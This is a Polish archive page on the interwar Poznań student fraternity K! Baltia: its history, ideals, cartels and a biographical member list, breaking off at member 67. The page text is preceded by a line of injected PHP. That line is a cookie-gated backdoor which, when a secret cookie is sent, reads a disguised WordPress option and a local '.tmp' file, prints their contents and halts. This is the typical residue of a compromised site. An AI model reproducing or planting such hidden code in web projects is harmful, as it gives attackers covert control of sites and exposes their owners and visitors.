if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Baltia

Dekiel NN Nazwa:
Korporacja Studentów Uniwersytetu Poznańskiego „Baltia”
Siedziba:
Poznań
Data powstania:
7 XII 1921 r.
Barwy:
wiśniowa – biała – złota
Dewiza:
„Salus Reipublicae suprema lex esto” („Dobro Ojczyzny najwyższym prawem”)

Rys historyczny

Herb Baltii, 1936 r. (

Baltia została założona dnia 7 XII 1921 r. przez grupę studentów Uniwersytetu Poznańskiego pochodzących z Pomorza. Skupiała głównie Pomorzan. Należała do tzw. korporacji morskich. Szczególnym celem Baltii było „krzewienie wśród społeczeństwa zamiłowania do morza, spolszczanie wybrzeża bałtyckiego, zabezpieczanie i rozszerzenia jego posiadania”. Nazwa korporacji odpowiadała jej celom, a na barwy wybrano barwy Gdańska. Bandy Baltii, od góry frakowa, rycerska, filisterska.
Baltia była korporacją o wyraźnym narodowym i katolickim profilu ideowym. Patronem korporacji został przywódca obozu narodowego Roman Dmowski, a jej członkami honorowymi m.in. gen. Józef Haller, poeta i ówczesny rektor Uniwersytetu Jana Kazimierza prof. Jan Kasprowicz, duszpasterz młodzieży akademickiej ks. prałat Józef Prądzyński oraz twórca poznańskiej szkoły ekonomicznej prof. Edward Taylor.

Od dnia 6 V 1922 r. korporacja była członkiem rzeczywistym Związku Polskich Korporacji Akademickich (data starszeństwa związkowego 7 XII 1921 r.).

Hymn Baltii autorstwa Jana Kasprowicza

Baltia szybko stała się najliczniejszym i jednym z najbardziej prężnych poznańskich związków korporacyjnych. W 1924 r. utworzone zostało Koło Filistrów oraz poświęcono sztandar korporacji. Prezesami miejscowej reprezentacji korporacyjnej - Poznańskiego Koła Międzykorporacyjnego było czterech Baltusów: w 1925/26 r. Stanisław Szayna oraz Stefan Stypa, w 1930/31 r. Marian Smoczkiewicz oraz w 1938/39 r. Józef Kortas, a w 1937/38 r. prezesem Związku Polskich Korporacji Akademickich został Franciszek Przytarski. Przy Baltii kandydowały nowopowstające poznańskie korporacje Laconia, Filomatia Posnaniensis oraz Odra.

Komers Baltii, 1930 r.

W marcu 1936 r. wraz z Masovią, Laconią i Gedanią Posnaniensis stworzyła Porozumienie Korporacji Morskich. Dzięki temu współuczestniczyła w organizowaniu “Tygodni Pomorza”, a w tych ramach “Akademii Morskich”. Corocznie w początkach stycznia korporacja organizowała uroczyste bale w salach dworu Artusa w Toruniu.

Baltia zawarła kartele: dnia 17 V 1924 r. z K! Z.A.G. Wisła z Gdańska oraz dnia 12 II 1925 r. z K! Aquilonia z Warszawy.

Zdjęcie pamiątkowe ze ślubu Piotra Chrościńskiego z Heleną ze Stenzlów, Poznań 19-28 III 1932 r.

Całkowita ustalona, niekompletna imienna lista członków zawiera 316 nazwisk, w tym 19 członków honorowych.

Po wojnie Baltia organizowała nieoficjalnie spotkania, w tym urządzane corocznie w latach 70-tych komerse. W początkach lat 80-tych powstała także Historia Baltii – Korporacji Studentów Uniwersytetu Poznańskiego 1921 - 1939. W 2002 r. z inicjatywy Daniela Nowickiego z K! Lechia doszło do reaktywacji (www.baltia.pl).

Lista członków

Poniższa, niekompletna lista członków Baltii obejmuje ponad 315 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Kazimierz Bajoński, (10 lutego 1880 w Raszkowie pow. Odolanów - 28 marca 1927 pod Dreznem) s. Józefa i Józefy z Zielewskich, absolwent Królewskiego Gimnazjum w Ostrowie, absolwent (dyplom z wyróżnieniem) studiów handlowych w Akwizgranie, dr ekonomii Uniwersytet we Fryburgu, działacz społeczny i gospodarczy, zasłużony dla rozwoju polskiego przemysłu w Wielkopolsce, po studiach pracował w zarządzie poznańskiego Banku Przemysłowców 1907-27, przewodniczył radzie nadzorczej Zachodnio-Polskiego Syndykatu Węglowego, wchodził w skład rady nadzorczej Browaru Huggera i Wielkopolskiej Papierni w Bydgoszczy, współzałożyciel przedsiębiorstw Hartwig-Kantorowicz, Fabryki Konserw Mięsnych w Bydgoszczy, Browaru Grodziskiego, Banku Polskiego, Drukarni Katolickiej, zaangażowany w prace nad wprowadzeniem polskiej waluty - złotego - w Wielkopolsce, działacz m.in. Towarzystwa Pomocy Naukowej im. Karola Marcinkowskiego i Komitetu Tanich Kuchni, Filister honorowy Baltii, pierwszy (?) prezes Koła Filistrów 1924-26, zmarł w czasie pobytu w sanatorium pod Dreznem
 2. Feliks Bolt, (7 stycznia 1864 w Barłożynie pow. Starogard - 7 kwietnia 1940 w Stutthofie) z rodziny chłopskiej, s. Józefa i Joanny z Grajkowskich, ksiądz katolicki, działacz narodowy i społeczny, długoletni poseł i senator z ramienia SN, Filister honorowy Baltii, aresztowany przez Gestapo 24 października 1939 w Srebrnikach, osadzony w obozie koncentracyjnym w Stutthofie, gdzie zmarł, pochowany w Gdańsku na Zaspie
 3. Adam Leon Schedlin-Czarliński, (29 września 1870 w Zakrzewku - 30 kwietnia 1956 w Chełmży) absolwent Gimnazjum w Toruniu, studiował agronomię, ziemianin, działacz narodowy, członek Rady Patronackiej Kółek Rolniczych, czynnie działał na rzecz powrotu Pomorza do Polski, utworzył Toruńską Straż Ludową 1918, prezes Powiatowej Rady Ludowej w Toruniu, po I wojnie światowej działacz spółdzielczości rolniczej na Pomorzu, starosta powiatowy ziemi chełmińskiej na Pomorzu, następnie starosta powiatowy w Grudziądzu, wieloletni przewodniczący Rady Nadzorczej Powiatowej Komunalnej Kasy Oszczędnościowej w Grudziądzu, za zasługi dla Kościoła Katolickiego uhonorowany przez papieża Piusa XI godnością tajnego świeckiego szambelana Jego Świętobliwości, odznaczony m.in. Krzyżem Oficerskim OOP oraz srebrnym Krzyżem Zasługi, Filister honorowy Baltii, pochowany w grobowcu rodzinnym w Papowie Toruńskim

  Roman Dmowski.

 4. Roman Dmowski, (9 sierpnia 1864 w Kamionku - 2 stycznia 1939 w Drozdowie), s. Romana i Józefy z Lenarskich, student i absolwent Wydziału Fizyczno-Matematycznego UW 1886-1890, dr nauk przyrodniczych, polityk, publicysta polityczny, dyplomata, współzałożyciel Narodowej Demokracji (ruchu narodowego), główny ideolog polskiej myśli narodowej, delegat Polski na konferencję paryską w 1919 i sygnatariusz traktatu pokojowego w Wersalu, Minister Spraw Zagranicznych RP, poseł na Sejm RP oraz II i III Dumy, doctor honoris causa UP 1923, Patron Konwentu Baltia

  Józef Haller, 1927 r.

 5. Józef Haller von Hallenburg, (13 sierpnia 1873 w maj. Jurczyce pod Krakowem - 4 czerwca 1960 w Londynie) z rodziny ziemiańskiej, s. Henryka i Olgi z Treterów, ojciec Eryka (Kujawja, Corona), stryj Cezarego (Jagiellonia), generał broni WP, legionista, harcmistrz, Przewodniczący ZHP, działacz polityczny i społeczny SN i Frontu Morges, poseł na Sejm, Filister honorowy Baltii i Sparty, prezes Związku Filistrów Baltii 1926-28, w czasie II wojny światowej Minister Oświaty w Polskim Rządzie na Uchodźstwie 1940-43, po 1945 pozostał na emigracji w Wielkiej Brytanii, pochowany na cmentarzu Gunnersbury, w 1993 jego prochy wróciły do Polski i spoczęły w krypcie w kościele garnizonowym św. Agnieszki w Krakowie, odznaczony m.in. Orderem Orła Białego, Krzyżem Srebrnym Orderu Wojennego Virtuti Militari, Krzyżem Komandorskim Orderu Odrodzenia Polski oraz czterokrotnie Krzyż Walecznych

 6. Władysław Jabłonowski, (22 września 1865 w Żabokrzyczu, Podole - 21 czerwca 1956 w Sopocie), s. Juliana i Marii z ks. Woronieckich, absolwent Gimnazjum w Białej Cerkwi, studiował nauki przyrodnicze, filozofię, filologię i psychologię we Lwowie, Genewie, Paryżu i Lipsku, krytyk literacki, nowelista, redaktor “Młodej Polski”, “Głosu Warszawskiego”, “Gazety Warszawskiej”, autor zbiorów esejów, szkiców krytyczno-literackich, działacz polityczny związany z Narodową Demokracją, współzałożyciel Ligi Narodowej 1893 i Stronnictwa Narodowej Demokracji 1905, poseł do III Dumy Państwowej, członek Tymczasowej Rady Naukowej, poseł na Sejm i senator RP, Filister honorowy Baltii
 7. Tadeusz Janowski, ( - 11 lutego 1934 w Toruniu) mjr WP, komendant Straży Ludowej w Toruniu 1919, radca Magistratu m. Torunia, działacz narodowy, członek licznych organizacji społecznych na Pomorzu, odznaczony m.in. Krzyżem Niepodległości, Krzyżem Walecznych, Złotym Krzyżem Zasługi, Krzyżem Powstania Wielkopolskiego, Filister honorowy Baltii
 8. Grzegorz Kardaś, (22 listopada 1909 w Bydgoszczy - 10 grudnia 1988 w Bydgoszczy) absolwent Gimnazjum oo. Salezjanów w Aleksandrowie Kujawskim 1930, student prawa, a później muzykologii na Wydziale Filozoficznym UP, pianista, kompozytor, muzykolog, po wojnie pracownik Polskiego Radia w Bydgoszczy (pianista, improwizator, akompaniator, kompozytor), kierownik muzyczny Teatru Miejskiego, a po reorganizacji Państwowego Teatru Ziemi Pomorskiej i Teatru Polskiego, odznaczony m.in. Złotym Krzyżem Zasługi, odznaką honorową „Bydgoszcz - Zasłużonemu Obywatelowi”, pochowany na Cmentarzu przy ul. Wiślanej w Bydgoszczy
 9. Jan Kasprowicz, (12 grudnia 1860 w Szymborzu - 1 sierpnia 1926 w Zakopanem) s. Piotra i Józefy z Kloftów, absolwent Gimnazjum św. Marii Magdaleny w Poznaniu 1884, studiował filozofię i literaturoznawstwo na uniwersytetach w Lipsku i we Wrocławiu, poeta, dramaturg, krytyk literacki i tłumacz, przedstawiciel Młodej Polski, uważany za jednego z najwybitniejszych poetów w dziejach literatury polskiej, od 1909 kierownik katedry komparatystyki literackie UJK, rektor UJK 1921-22, autor hymnu i Filister honorowy Baltii, pochowany w Zakopanym
 10. Stanisław Kozicki, (4 kwietnia 1876 w Łępicach na Mazowszu - 28 września 1958 w Polanicy Zdroju) dr nauk rolniczych, narodowy działacz społeczny, od 1899 członek ZET oraz Ligi Narodowej, a od 1902 Stronnictwa Narodowej Demokracji, od 1910 członek Komitetu Centralnego Ligi Narodowej i Zarządu Głównego Stronnictwa Demokratyczno-Narodowego, członek Komitetu Narodowego Polskiego w Paryżu 1917, sekretarz delegacji polskiej na Kongresie Wersalskim, poseł do Sejmu Związku Ludowo Narodowego 1922-26, prezes klubu parlamentarnego ZLN, senator 1928-35, Filister honorowy Baltii, podczas wojny doradca polityczny przy Komendzie Głównej AK
 11. Stefan Łaszewski, (8 stycznia 1862 w Brachnówku - 20 marca 1924) z rodziny ziemiańskiej, studiował prawo na uniwersytetach we Wrocławiu, Berlinie i Lipsku, dr prawa, od 1892 adwokat w Grudziądzu, działacz polityczny związany z Narodową Demokracją, polski poseł w parlamencie Rzeszy wybrany z okręgu kartusko-pucko-wejherowskiego 1911-18, wiceprezes parlamentarnego Koła Polskiego 1917-18, po odzyskaniu niepodległości działacz Związku Ludowo Narodowego, poseł na Sejm RP, pierwszy wojewoda pomorski, potem prezes Najwyższego Trybunału Administracyjnego w Warszawie, Filister honorowy Baltii, pochowany na Cmentarzu w Pelplinie, jego pamięć uczczono obeliskiem w Toruniu
 12. Stefan Michałek, (13 maja 1888 w Nowym Mieście nad Drwęcą - 17 stycznia 1955 w Warszawie) s. Bolesława i Melanii z d. Boye, absolwent Gimnazjum w Brodnicy, studiował prawo i ekonomię na uniwersytetach w Bonn, Monachium i Królewcu, adwokat i notariusz, od 1920 sędzia Sądu Okręgowego w Toruniu, działacz społeczny i polityczny związany z Narodową Demokracją, prezydent Torunia 1922-24 (rezygnacja styczniu 1924), wiceprezes Koła Miast Pomorza, współinicjator założenia i pierwszy prezes Towarzystwa Miłośników Torunia, poseł na Sejm RP 1928 (po kilku miesiącach złożył mandat), wieloletni prezes Pomorskiej Izby Adwokackiej w Toruniu, Filister honorowy Baltii
 13. Paweł Ossowski, (1878 w Śliwicach - 1939 w Barbarze k. Torunia) s. Józefa i Katarzyny z Galikowskich, filomata pomorski, dr prawa, adwokat i notariusz w Toruniu, członek Sądu Dyscyplinarnego przy Naczelnej Radzie Adwokackiej w Warszawie, działacz społeczny i polityczny związany ze Stronnictwem Narodowym, starosta chełmiński 1920-22, przewodniczący Rady Wojewódzkiej Stronnictwa Narodowego na Pomorzu 1928-29, senator RP, Filister honorowy Baltii, wiceprezes Związku Filistrów Baltii 1926-28, aresztowany przez Niemców na początku wojny i rozstrzelany w Barbarce k/Torunia

  Józef Prądzyński.

 14. Józef Prądzyński, (1877 w Żołędowie - 27 czerwca 1942 w Dachau) duchowny katolicki, prałat, organizator życia społeczno-gospodarczego i katolickiego w Wielkopolsce, kierownik Księgarni św. Wojciecha, członek Naczelnej Rady Ludowej w Poznaniu 1918-19, dziekan generalny wojsk Powstania Wielkopolskiego, senator RP I kadencji, duszpasterz akademicki UP, Filister honorowy i prezes Koła Filistrów Korporacji Baltii 1936-38, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, w czasie II wojny światowej współorganizator Delegatury Rządu w Poznaniu, współzałożyciel konspiracyjnej organizacji “Ojczyzna” 1939, aresztowany przez Gestapo 1941, osadzony w Forcie VII w Poznaniu, a następnie zesłany do obozu koncentracyjnego i tam stracony, odznaczony Virtuti Militari

 15. Józef Szczepański, dr med., organizator służby zdrowia i PCK na Pomorzu, działacz narodowy na terenie Pomorza, starosta wąbrzeski, Filister honorowy Baltii, skreślony 1927

  Edward Taylor, 1927 r.

 16. Edward Taylor, (28 września 1884 w Kielcach - 9 sierpnia 1964 w Poznaniu) ojciec Leona (Corona), ekonomista, od 1919 prof. UP, a później także WSH, przedstawiciel neoklasycznej szkoły w ekonomii, przeciwnik etatyzmu i zwolennik indywidualizmu gospodarczego, twórca tzw. poznańskiej szkoły ekonomicznej, organizator studiów ekonomicznych i prawa skarbowego UP, tłumacz klasyki ekonomii, działacz społeczny i narodowy związany ze Stronnictwem Narodowym, członek Rady Naczelnej Związku Ludowo-Narodowego, radny w radzie miejskiej Poznania 1930-32, kurator i Filister honorowy Baltii

 17. Zygmunt Wasilewski, (29 kwietnia 1865 we wsi Siekierno - 25 października 1948 w Zakopanem) absolwent Gimnazjum w Kielcach, studiował prawo w Warszawie, Kijowie i Sankt Petersburgu, dyplom 1889, działacz niepodległościowy związany z ruchem narodowym, od 1887 członek “Zetu”, od 1889 Ligi Narodowej, wraz ze Stefanem Żeromskim pracownik biblioteki w Muzeum Polskim w Raperswilu 1892-94, redaktor naczelny tygodnika “Głos” w Warszawie, “Słowa Polskiego” we Lwowie, “Sprawy Polskiej” w Sankt Petersburgu, “Przeglądu Polskiego” w Kijowie, “Gazety Warszawskiej” 1918-25, “Myśli Narodowej” 1925-39, senator III kadencji z ramienia Stronnictwa Narodowego, Filister honorowy Baltii, po wojnie osiadł w Wiśle

  Bogdan Wasiutyński, 1926 r.

 18. Bogdan Wasiutyński, (25 grudnia 1882 - 29 grudnia 1940) ojciec Wojciecha (Aquilonia), oraz Wacława i Witolda (Sarmatia), prof. prawa administracyjnego UP i UW, działacz i publicysta związany z Narodową Demokracją, członek Ligi Narodowej, senator RP 1928-35, prezes Rady Naczelnej Stronnictwa Narodowego 1935-37, Filister honorowy Baltii

 19. Józef Wybicki, (3 września 1866 w Niewierzu k. Brodnicy - 28 kwietnia 1929 w Toruniu) s. Michała i Heleny z d. Sulerzyskiej, wnuk Józefa Wybickiego, absolwent Gimnazjum w Brodnicy 1888, filomata pomorski, studiował med. we Wrocławiu, Lipsku i Berlinie, dr med., działacz społeczno-polityczny, twórca POW na Pomorzu 1918, podkomisarz Naczelnej Rady Ludowej w Gdańsku, w 1919 aresztowany przez Niemców i zmuszony od opuszczenia Gdańska, po odzyskaniu niepodległości pierwszy starosta krajowy pomorski 1920-21 oraz 1923-29, minister b. dzielnicy pruskiej, w 1925 organizator i pierwszy dyrektor Instytutu Bałtyckiego, Filister honorowy Baltii, odznaczony m.in. Virtuti Militari, Orderem Polonia Restituta z Gwiazdą, Krzyżem Rycerskim św. Grzegorza, Krzyżem Wojskowym Organizacji Pomorskiej

Członkowie rzeczywiści

 1. Kazimierz Balcerski, ( - 1939) założyciel Baltii, wiceprezes Akademickiego Koła Pomorskiego 1922, prawnik, adwokat i notariusz w Wąbrzeźnie, oficer rez., poległ w wojnie obronnej 1939
 2. Wiktor Balcerski, c. 1926, wystąpił 1927

  Stefan Balewski, 1934 r.

 3. Stefan Balewski, filomata pomorski w Kwidzyniu, student prawa UP, c. 1929, prezes sem. zim. 1934/35, aplikant sądowy w Toruniu

 4. Tadeusz Balewski, student i absolwent prawa 1927/28 UP, wiceprezes sem. zim. (od grudnia) i sem. let. 1925/26 oraz sem. let. 1926/27, prezes sem. let. 1926/27, w komisji przygotowawczej VII Zjazdu ZPKA, wiceprezes Akademickiego Koła Pomorskiego 1925-26, aplikant sądowy w Starogardzie
 5. Witold Bałachowski, (14 października 1892 w Ciborzu w pow. brodnickim - 1940 w Katyniu) s. Edmunda i Heleny z Pomierskich, filomata pomorski w Brodnicy, żołnierz I wojny światowej, Powstania Wielkopolskiego i wojny polsko-rosyjskiej 1920, organizator dywizji pomorskiej, dowódca baterii w 15 Pułku Artylerii Cięzkiej, student filologii w Berlinie i Poznaniu, sekretarz uniwersyteckiego Koła LOPP 1924, po studiach prof. Gimnazjum im. Mikołaja Kopernika w Bydgoszczy, por. rez. 7 Pułku Artylerii Ciężkiej, więzień Kozielska, zamordowany przez NKWD
 6. Jan Bandurski, c. 1929
 7. Dionizy Barcz, c. 1926, skreślony 1931
 8. Franciszek Baumgart, student med. weterynaryjnej, kierownik Straży Porządkowej w Poznaniu (bojówki SN), członek Zarządu Młodzieży Wszechpolskiej 1937

  Jan Baumgart, 1926/27 r.

 9. Jan Baumgart, (4 marca 1904 w Wudzynku na Pomorzu - 17 sierpnia 1989 w Krakowie) członek Towarzystwa Tomasza Zana w Chełmnie 1918-20, student i absolwent (mgr filozofii) 1927/28 Wydziału Humanistycznego UP, prezes sem. zim. 1926/27, bibliotekarz i bibliotekoznawca, po studiach pracownik Biblioteki UP i Poznańskiego Towarzystwa Przyjaciół Nauk, po wojnie dyrektor Biblioteki UJ, przewodniczący Stowarzyszenia Bibliotekarzy Polskich 1966-69, historyk, prof. UJ

 10. Marcjan Bielecki, (1901-1980) absolwent I LO im. M. Kopernika w Toruniu, filomata pomorski w Toruniu, student prawa UP, olderman sem. let. 1925/26 oraz 1926/27, kurator K! Laconia, po studiach urzędnik, współautor “Od morza jesteśmy od morza oraz Historia Baltii Korporacji Studentów Uniwersytetu Poznańskiego 1921-1939″ (Poznań b.r.w.)
 11. Stefan Bielicki, c. 1935, skreślony 1936
 12. Aleksy Binerowski, c. 1927, wiceprezes 1931/32, działacz Akademickiego Koła Pomorskiego
 13. Roman Błeński, (1910-1945) brat stryjeczny Józefa Błędzkiego (Capitolia) oraz Bolesława Błęckiego (Baltia), student prawa UP, c. 1929, sekretarz sem. zim. 1930/31, kurator K! Filomatia Posnaniensis, skarbnik Młodzieży Wszechpolskiej 1929/30; wiceprezes Koła Prawników i Ekonomistów 1930/31, prawnik, oficer rez., uczestnik wojny obronnej 1939, w czasie wojny więzień niemieckiego oflagu w Woldenbergu, zmarł po zakończeniu wojny
 14. Bolesław Błęcki, (17 grudnia 1904 w Pelpinie w pow. tczewskim - 1940 w Katyniu) s. Izydora i Marii z Szandrów, brat stryjeczny Józefa Błędzkiego (Capitolia) oraz Romana Błeńskiego (Baltia), uczeń Gimnazjum w Grudziądzu, filomata pomorski 1917-20 i członek ZET 1918-19, student i absolwent 1927/28 prawa UP, wiceprezes sem. zim. 1925/26, wiceprezes PKM sem. zim. 1925/26, aplikant sądowy, a następnie prokurator w Grudziądzu 1928, później sędzia Sądu Okręgowego w Starogardzie Gdańskim, ppor. rez. 1 Dywizjonu Taborów, w niewoli sowieckiej, zamordowany przez NKWD
 15. Edward Borkowski, c. 1926, olderman sem. let. 1927/28, prezes Młodzieży Wszechpolskiej 1925/26, kierownik Ruch Młodych OWP na Dzielnicę Zachodnią, red. dodatku akademickiego do “Kuriera Poznańskiego”
 16. Kazimierz Borus, (14 stycznia 1909 w Wąbrzeźnie [Briesen] - ) c. 1928, sekretarz r.a. 1933/34, ppor. rez. 56 Pułku Piechoty, uczestnik wojny obronnej 1939, więzień niemieckich oflagów: Oflagu XVIII C w Pongau-Markt w Austrii k/Salzburga, Oflagu X B k. Sandbostel w Niemczech oraz Oflagu w Woldenbergu
 17. Antoni Borzestowski, (1915-2003) c. 1936, wiceprezes Akademickiego Koła Pomorzan 1937 i 1938
 18. Marian Bross, (2 października 1900 w Witkowie k. Gniezna - 1940 w Katyniu) s. Konstantego i Heleny z Knastów, brat Stefana (Lutyko-Venedya) i Wiktora (Masovia), uczestnik wojny 1918-21, powstaniec wielkpolski, student i absolwent 1922 prawa UP, notariusz, wiceburmistrz Żnina, ppor. rez. piechoty, uczestnik wojny obronnej 1939, w niewoli sowieckiej, zamordowany przez NKWD
 19. Bernard Bruchwalski, c. 1928

  Bronisław Brunka, 1936 r.

 20. Bronisław Brunka, (1915? - 1996) wiceprezes Baltii sem. zim. 1936/37, członek Zarządu Akademickiego Koła Pomorzan 1936

 21. Jan Bruski, c. ok. 1925, skreślony 1925
 22. Edmund Buczkowski, członek Zarządu Akademickiego Koła Pomorzan 1921, w 1928 referendarz leśnictwa przy Dyrekcji Lasów Państwowych w Poznaniu, w 1930 referendarz leśnictwa przy Wielkopolskiej Izbie Rolniczej w Poznaniu
 23. Paweł Budzyński, skreślony 1933

  Marian Burchardt, 1931 r.

 24. Marian Burchardt, c. 1927

  Aleksander Buxakowski, 1928 r.

 25. Aleksander Buxakowski, (7 kwietnia 1901 we Wrocławiu - 16 stycznia 1970) s. Franciszka i Heleny z d. Jasińska, absolwent Gimnazjum św. Marii Magdaleny w Poznaniu 1921, student i absolwent (dr med. ) med. UP 1921-28, psychiatra, po studiach asystent, ordynator i prymariusz w Wojewódzkim Zakładzie Psychiatrycznym w Owińskach 1928-34, wicedyrektor Wojewódzkiego Zakładu Psychiatrycznego na Dziekance w Gnieźnie 1934-39, por. rez., w wojnie obronnej 1939 w 7. Wojskowym Szpitalu Okręgowym, w niewoli niemieckiej w oflagach, m.in. Gross Born i Sandboestel, po powrocie w 1947 do kraju, m.in. dyrektor Sanatorium dla Nerwowo Chorych w Wonieściu oraz Sanatorium Dziecięcego w Spławiu, od 1960 lekarz w Okręgowej Przychodni Lekarskiej PKP w Poznaniu, pochowany w grobie rodzinnym na Cmentarzu Junikowskim w Poznaniu

 26. Stanisław Charytoniuk(Charytomiuk), c. ok. 1930
 27. Józef Chmurzyński, filomata pomorski w Toruniu, prawnik, aplikant sądowy w Toruniu 1928
 28. Zygmunt Chmurzyński, prezes sem. zim. 1938/39
 29. Kazimierz Chrościelewski, student i absolwent 1935/36 prawa UP, c. 1929, działacz Akademickiego Koła Pomorskiego

  Piotr Chrościński, 1932 r.

 30. Piotr Chrościński, (1895-1956) student prawa UP, założyciel Baltii, pierwszy olderman sem. zim. 1921/22 oraz 1922/23, prezes sem. zim. i sem. let. 1925/26, działacz Akademickiego Koła Pomorskiego

 31. Zygmunt Chylarecki, student i absolwent (dr med.) 1925/26 med. UP, lekarz w Białośliwiu pow. Wyrzysk
 32. Stefan Chylewski, prezes 1936
 33. Wacław Ciesielski, (6 września 1898 w Orłowie - 2 lutego 1941 w Auschwitz) s. Wacława i Heleny z d. Czarnota-Bojarska, uczeń Gimnazjum w Chełmnie, w czasie I wojny światowej w armii niemieckiej, podoficer WP 1919-20, student Wydziału Prawno-Ekonomicznego UP, założyciel i pierwszy prezes Baltii sem. zim. i sem. let. 1921/22, prezes 1922/23, dziennikarz, redaktor “Gońca Pomorskiego” i “Gazety Bydgoskiej”, działacz narodowy na Pomorzu, kierownik Ruchu Młodych OWP na Pomorzu, podczas okupacji niemieckiej p.o. kierownika Okręgowej Delegatury Rządu na Pomorze, członek organizacji konspiracyjnych Narodowa Organizacja Bojowa (komendant Okręgu Pomorskiego), Grunwald, Ojczyzna i Związek Walki Zbrojnej, aresztowany w 1940 i osadzony w obozie koncentracyjnym w Auschwitz, gdzie zginął
 34. Edmund Cymbrowski, c. ok. 1925, skreślony 1925, działacz Akademickiego Koła Pomorskiego
 35. Atanazy Czapiewski, (2 maja 1913 w Brusach - 1983) student i absolwent 1946 med. UP, członek Zarządu Koła Medyków UP 1937, dr med.
 36. Antoni Czerwiński, c. 1927, członek Zarządu SN na Pomorzu, jeden z przywódców frakcji „młodych” SN, red. “Słowa Pomorskiego”
 37. Edmund Dębski, ( - październik 1931) student i absolwent 1926/27 prawa UP
 38. Józef Dębski, student i absolwent (dr med.) 1925/26 med. UP, lekarz w Katowicach, Biołośliwiu (pow. Wyrzysk), Poznaniu i Toruniu, prawd. zmarł w obozie pracy przymusowej w Potulicach
 39. Telesfor Dębski,
 40. Włodzimierz Doktór, c. ok. 1930
 41. Tadeusz Dominikiewicz, c. 1926, wystąpił 1927, działacz Akademickiego Koła Pomorskiego
 42. Stanisław Dzięgielewski I, c. 1929, wiceprezes PKM sem. let. 1934/35, muzykolog, kompozytor, dyrygent Teatru Wielkiego w Poznaniu i m.in. scen wileńskich, współautor publikacji “Od morza jesteśmy od morza oraz Historia Baltii Korporacji Studentów Uniwersytetu Poznańskiego 1921-1939″ (Poznań b.r.w.), autor muzyki do Hymnu K Demetrii z Poznania
 43. Stanisław Dzięgielewski II, (1903-1981) filomata pomorski w Brodnicy, student i absolwent 1933/34 leśnictwa UP, doc. dr hab., specjalista leśnictwa, w czasie okupacji od 1940 w ZWZ-AK
 44. Eustachy Eliszewski, c. 1925, skreślony 1928, skarbnik Zarządu Akademickiego Koła Pomorskiego 1927/28
 45. Edmund Feuer,
 46. Janusz Fixa, ( - ok. 1945) skreślony 1931, sekretarz Młodzieży Wszechpolskiej 1924, działacz Akademickiego Koła Pomorskiego, w niewoli w niemieckim oflagu, po wyzwoleniu czynny członek Polskiej Misji Wojskowej, zmarł tragicznie (wypadek samochodowy)

  Zdzisław Gayda, ok. 1921 r.

 47. Zdzisław Paweł Gayda (Gajda), (25 marca 1902 w Parchowie pow. Kartuzy - 25 stycznia 1951) s. Józefa i Wiktorii z d. Sroka, brat stryjeczny Józefa (Surma) i Leona (Pomerania), absolwent Gimnazjum Humanistycznego w Chełmnie 1920, filomata pomorski, prezes Towarzystwa Tomasza Zana w Chełmnie 1919, uczestnik wojny polsko-rosyjskiej 1920 w 16 Pułku Artylerii Lekkiej, student i absolwent prawa UP 1921-23, założyciel Baltii, od 1929 adwokat w Poznaniu, II wiceprezes Koła Filistrów 1929-31, w czasie okupacji mieszkał w Częstochowie, po wojnie od 1947 adwokat Elblągu

 48. Edward Gajowczyk, ( - przed 1926 w Ostrowie) student prawa UP, wiceprezes Koła Prawników UP 1923/24, członek Rady Naczelnej Młodzieży Wszechpolskiej 1921-23, prawnik
 49. Erazm Galczewski, c. 1926, wystąpił 1927, działacz Akademickiego Koła Pomorskiego
 50. Franciszek Garczyński, c. ok. 1930
 51. Włodzimierz Gębarski, c. 1928; sekretarz sem. zim. 1931/32
 52. Jan Gibas, filomata pomorski w Starogardzie Gdańskim, prawnik, aplikant Prokuratorii Generalnej w Poznaniu 1930
 53. Józef Gibas, (27 kwietnia 1906 - ) filomata pomorski w Świeciu, student i absolwent 1927/28 prawa UP, c. 1926, sekretarz sem. zim. 1928/29, zastępca prokuratora Bratniej Pomocy Studentów UP, po studiach adwokat
 54. Kazimierz Głogowski,
 55. Antoni Goldberg, sekretarz sem. let. 1938/39 (ostatnie Prezydium przed wojną), wywieziony 13 września 1942 do obozu koncentracyjnego w Auschwitz
 56. Józef Górczyński, (1901-1976) filomata pomorski w Toruniu, student i absolwent ekonomii UP (?), wiceprezes sem. let. 1921/22
 57. Mieczysław Górecki, c. 1930/31
 58. Edward Graczyk, c. 1926, skreślony 1926, działacz Akademickiego Koła Pomorskiego
 59. Teodor Graduszewski, (1898-1981) student i absolwent 1926/27 leśnictwa UP
 60. Kazimierz Grenda, c. 1926, wystąpił 1927
 61. Aleksander Gronowicz, ( - ok. 14 maja 1926) twórca melodii do hymnu Baltii - “Pieśni Baltii”
 62. Stanisław Grześkowiak, c. 1927, wystąpił 1928
 63. Józef Hanelt (Henelt), student i absolwent farmacji UP, c. 1926
 64. Teodor Hermańczyk, c. 1929, muzykolog, działacz Akademickiego Koła Pomorskiego
 65. Tadeusz Zygmunt Hernes, (8 sierpnia 1906 w Borzykowie w pow. wrzesińskim - 1940 w Katyniu) s. Karola i Stanisławy z Budzyńskich, studnet PG, student prawa i polonistyki UP, c. 1927, ps. “Tadzio z Borzychowa”, założyciel studenckiego kabaretu “Stratosfera”, redaktor “Biuletynu Korporacyjnego”, dziennikarz, humorysta, satyryk, współpracownik rozgłośni poznańskiej Polskiego Radia, ppor. rez., przydzielony do 68 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 66. Bolesław Hopa, c. ok. 1935, skreślony 1935/36
 67. Stanisław Iwicki, ( - 1940-45) student i absolwent ekonomii UP, założyciel i pierwszy I wiceprezes Baltii sem. zim. 1921/22, sekretarz 1922/23, prezes sem. zim. 1923/24, działacz Towarzystwa Gimnastycznego “Sokół”, jeden z założycieli Młodzieży Wszechpolskiej w Poznaniu, w 1939 jeden z kierowników konspiracyjnej organizacji “Grunwald”, aresztowany 1940, zamordowany w obozie koncentracyjnym w Stutthofie (wg innej wersji zmarł na tyfus 1944/45)
